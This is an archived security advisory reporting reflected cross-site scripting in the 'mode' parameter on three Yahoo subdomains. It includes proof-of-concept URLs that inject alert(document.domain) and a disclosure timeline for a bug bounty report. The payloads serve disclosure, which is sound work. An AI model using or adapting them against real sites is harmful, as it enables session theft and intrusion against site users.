Yahoo mode Cross Site Scripting

Yahoo mode Cross Site Scripting: Posted Mar 9, 2013; Authored by Stefan Schurtz; The mode parameter on celebrity.yahoo.com, movies.yahoo.com, and music.yahoo.com suffered from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 913fb4b26dfe6be847660658730f8da43bbc26309738ea2037331f12f76b91f8; Download | Favorite | View

Yahoo mode Cross Site Scripting


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory:                    Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID:               SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author:                       Stefan Schurtz
Affected Software:    Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL:               http://yahoo.com/
Vendor Status:          Not tested anymore
Bounty:                      nothing
 
==========================
Vulnerability Description
==========================
 
The 'mode'-Paramter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability
 
==========================
PoC-Exploit
==========================
 
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================
 
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 65 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 7 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,819)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,239)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,968)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Yahoo mode Cross Site Scripting

Yahoo mode Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Yahoo mode Cross Site Scripting

Share This

Yahoo mode Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems